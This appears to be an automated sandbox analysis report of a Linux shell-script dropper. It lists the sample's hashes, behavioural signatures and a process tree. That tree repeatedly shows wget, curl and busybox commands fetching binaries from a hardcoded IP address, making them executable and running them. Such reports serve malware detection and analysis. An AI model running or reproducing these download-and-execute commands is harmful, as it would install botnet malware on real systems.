Analysis
-
max time kernel
46s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
24/11/2024, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
-
Size
10KB
-
MD5
f9ec55ea475d5bf2658f26f7f7280c34
-
SHA1
223f1daef72dbab6429966084f88ef60a26414c0
-
SHA256
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d
-
SHA512
1eed0d4a83f257ce571b39a36402dcb8f57e8472144723dddd8f818dcdc12822d4fa9b2db7082665fd82ad30ab790dd8bafa0c7932ba13c04651e782f53953aa
-
SSDEEP
192:EJ/5zEEuzm7PVm+Dgxbw4STnf777PVm+/EEuzufw4STnKjo:y/5v7PVm+DgxMv7PVm+Bo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1576 chmod 1590 chmod 1516 chmod 1510 chmod 1534 chmod 1504 chmod 1528 chmod 1540 chmod 1522 chmod 1582 chmod 1602 chmod 1614 chmod 1620 chmod 1498 chmod 1558 chmod 1570 chmod 1546 chmod 1552 chmod 1596 chmod 1608 chmod 1632 chmod 1638 chmod 1644 chmod 1564 chmod 1626 chmod 1650 chmod 1656 chmod 1492 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ 1493 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT 1499 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s 1505 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 1511 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk 1517 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m 1523 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q 1529 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM 1535 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 1541 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv 1547 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj 1553 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI 1559 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh 1565 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy 1571 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 1577 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk 1583 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m 1591 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q 1597 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM 1603 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv 1609 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy 1615 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj 1621 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI 1627 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh 1633 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 1639 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ 1645 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT 1651 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s 1657 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk curl File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM curl File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv curl File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy curl File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s curl File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 curl File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj curl File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q curl File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s curl File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI curl File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh curl File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ curl File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m curl File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM curl File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 curl File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv curl File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy curl File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI curl File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj curl File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 curl File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ curl File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT curl File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk curl File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q curl File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh curl File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 curl File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m curl File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT curl
Processes
-
/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh1⤵PID:1484
-
/bin/rm/bin/rm bins.sh2⤵PID:1485
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1486
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Writes file to tmp directory
PID:1490
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1491
-
-
/bin/chmodchmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- File and Directory Permissions Modification
PID:1492
-
-
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Executes dropped EXE
PID:1493
-
-
/bin/rmrm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1494
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1495
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Writes file to tmp directory
PID:1496
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1497
-
-
/bin/chmodchmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- File and Directory Permissions Modification
PID:1498
-
-
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Executes dropped EXE
PID:1499
-
-
/bin/rmrm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1500
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1501
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Writes file to tmp directory
PID:1502
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1503
-
-
/bin/chmodchmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- File and Directory Permissions Modification
PID:1504
-
-
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Executes dropped EXE
PID:1505
-
-
/bin/rmrm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1506
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1507
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1509
-
-
/bin/chmodchmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Executes dropped EXE
PID:1511
-
-
/bin/rmrm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1512
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1513
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1515
-
-
/bin/chmodchmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Executes dropped EXE
PID:1517
-
-
/bin/rmrm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1518
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1519
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1521
-
-
/bin/chmodchmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Executes dropped EXE
PID:1523
-
-
/bin/rmrm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1524
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1525
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1527
-
-
/bin/chmodchmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Executes dropped EXE
PID:1529
-
-
/bin/rmrm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1530
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1531
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1533
-
-
/bin/chmodchmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Executes dropped EXE
PID:1535
-
-
/bin/rmrm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1536
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1537
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1539
-
-
/bin/chmodchmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Executes dropped EXE
PID:1541
-
-
/bin/rmrm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1542
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1543
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1545
-
-
/bin/chmodchmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1548
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1549
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1551
-
-
/bin/chmodchmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1554
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1557
-
-
/bin/chmodchmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Executes dropped EXE
PID:1559
-
-
/bin/rmrm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1560
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1561
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1563
-
-
/bin/chmodchmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1566
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1567
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1569
-
-
/bin/chmodchmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1572
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1573
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1575
-
-
/bin/chmodchmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1578
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1579
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1581
-
-
/bin/chmodchmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1584
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1585
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Writes file to tmp directory
PID:1588
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1589
-
-
/bin/chmodchmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- File and Directory Permissions Modification
PID:1590
-
-
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Executes dropped EXE
PID:1591
-
-
/bin/rmrm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1592
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1593
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Writes file to tmp directory
PID:1594
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1595
-
-
/bin/chmodchmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Executes dropped EXE
PID:1597
-
-
/bin/rmrm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1598
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1599
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1601
-
-
/bin/chmodchmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Executes dropped EXE
PID:1603
-
-
/bin/rmrm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1604
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1605
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Writes file to tmp directory
PID:1606
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1607
-
-
/bin/chmodchmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Executes dropped EXE
PID:1609
-
-
/bin/rmrm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1610
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1611
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1613
-
-
/bin/chmodchmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Executes dropped EXE
PID:1615
-
-
/bin/rmrm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1616
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1617
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1619
-
-
/bin/chmodchmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Executes dropped EXE
PID:1621
-
-
/bin/rmrm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1622
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1623
-
-
